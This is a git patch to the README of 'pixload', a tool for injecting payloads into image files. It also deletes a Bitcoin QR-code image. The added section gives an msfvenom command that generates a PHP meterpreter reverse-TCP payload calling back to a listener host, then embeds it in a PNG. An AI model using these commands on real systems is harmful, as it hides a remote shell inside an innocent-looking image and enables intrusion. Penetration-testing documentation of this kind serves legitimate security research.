From 3035bab65610097862d72c30eba7e3653257a06c Mon Sep 17 00:00:00 2001
From: Alexandr Savca <alexandr.savca89@gmail.com>
Date: Wed, 29 Jul 2020 21:02:44 +0300
Subject: [PATCH] README.md: mention about msfvenom

---
 README.md      |  13 +++++++++++++
 btc-qrcode.png | Bin 1523 -> 0 bytes
 2 files changed, 13 insertions(+)
 delete mode 100644 btc-qrcode.png

diff --git a/README.md b/README.md
index 5be178a..55c8c32 100644
--- a/README.md
+++ b/README.md
@@ -6,6 +6,8 @@ Set of tools for ~~hiding backdoors~~ creating/injecting payload into images.
 
 The following image types are currently supported: BMP, GIF, JPG, PNG, WebP.
 
+#### about
+
 Useful references for better understanding of `pixload` and its use-cases:
 
 - [Bypassing CSP using polyglot JPEGs](https://portswigger.net/blog/bypassing-csp-using-polyglot-jpegs)
@@ -23,6 +25,17 @@ both valid x86 shellcode and a valid image file, I recommend you to look
 [here](https://warroom.securestate.com/bmp-x86-polyglot/) and
 [here](https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/bmp_polyglot.rb).
 
+#### msfvenom
+
+If you want to inject a metasploit payload, try something like this:
+
+```bash
+msfvenom -p php/meterpreter_reverse_tcp \
+	LHOST=192.168.0.1 LPORT=31337 -f raw > payload.php
+# Edit payload.php if need.
+./pixload/png.pl -payload "$(cat payload.php)" -output payload.png
+```
+
 ## SETUP
 
 The following Perl modules are required:
diff --git a/btc-qrcode.png b/btc-qrcode.png
deleted file mode 100644
index 4ee2f163c44df1bda48f1ebc1ea2f14b592cc847..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 1523
zcma)6e@qi+7%mgF{=jPX#{?G2AeqUW!^rASdL5JTBTHb@0YXR7xk)HPH?fuicjug;
zGZ|_$lPnuOqYjixyGaCXX^Y!}xCBqcQcAg=BnaEl-eI7<((CnB|7eeYmh6)6zDvIM
zd+&Lk_j%v59~I^$tWH`j5C{?q@^kh@_E2Qq6RwE7*8=<QMz&R7<(Jh71nd5Mx#E7<
zye?TFSpG{vPWC7DKYOw4qZ2#VFMqsqFm1<QamTsLU2CW_f_I1By6ENHqu9mvOmWWH
z&tG`i$g{Gk&c=nLtgtko3C5iQ<5Nxxv*I_@3)AM-=RAAkyZ*iFztN_?BFg^H1E{#-
zZ?CtD*oSO$-I!TyLMbD_)jE<v*hkN{Z`dzNkLJ66s~PSz+|QLvDO*hCnW#1W01M_i
zC`gBK)~8#4kN#?08R)QUrtIkXFwkJNC)NAH-3S71`mIst&SDaCqu>U6lB{x7f>W9y
z+t$cA)oZ6MnTeB8%y@e<rQ3v5n8PO;;3i)=q`0&pO73=7Gi69LJFcQ(u$UeXlkDQe
zLt&I;wSKb5Xg4V2*70;hkm~MioM;Qv&uhMqN^;?LQg|WDL#7<<E<uj@gL)dV0LJ^V
z1o!++0T(J4CtA{Pkc@(55QX|ZUWchKrYB2{xTOT7ohoC=GTZn(RJw$fCP1=wyVTjq
zSSe`b$86!D(SMkEI2MsFFEWov4yutLp?OZsw6P(jn6cw~hpgHd!zVqLttL^(!{#F5
zo4QtUg)R8@T>_7Q4UXbGRp)jQ4ni6=Y8v*LYo<F!Kwp(p1h0(MZ0bN|kenY>I~KY-
z9akw`2j!l<GC&<V6E(%B=F89twqv-jo;IB#*k^VL>6y2c%i@3sF+Hk((&AFIsbPyo
zm0)eKI5l(FZ0gg6s*SN?)iRUE<SuEWrA#j+j;M@>H-a#|dyR5Qgd{YgY#FoIOr~~t
zTq>%->Wro%z2flN7}o2xvd}H!j=$SMk(+U_$L+z35NrpNwZvP7AGMWiXulc{bdWP$
zB!gpW-5%aFE@glO2>tv3R`pP-LNahn3+IT;OClZwpUAo%y-F#PA*P%r)Tw$KtU{Ws
z12MMF(bjNvPkR=&*Si4Cxf=RabjB6FGRME%0{Z%b`&BJtpv`{AYeqZetX1RB<n47>
z>McR*DvPlyNR`q+FM6;U;elj$6VJ4(xl&58)#~$R0$8w1IAYI*mmjn7PeW2ZPixtS
zw(@UJQfedQCe*KYpX8Wdc_5J{fC<AYJu^^BKh`T=+iD6c&-W9WdI`t(SbkZ8t-P)n
zy;e%~Qh*rrF?L&#FB~SA7ZTo(uEjabgdU#-Y!-97Sc=|q`QMr2&j)*SC-t2*)5CNg
zZL<_XcSug*=llI!+m;=-&BvI0TI11!vw04jWruwpt?ZAOrn^Q*402UbZwCSRdfSFZ
z*>j)K?lk~!54@+@2*}u*jkT~3dO_;oz7;XGrp6ZM%*FJXJr+N6qNS28?C%Su@ZjYM
zu<1=##bHv>2$;9Se&`yC?q<1VVqVCaM_L)kjm)$f-Q2>w3PzG**Z;?aTsk_Z#KJ(R
VFb&T5Ix@ut1s@dV7~Vg4`d?G>`{@7x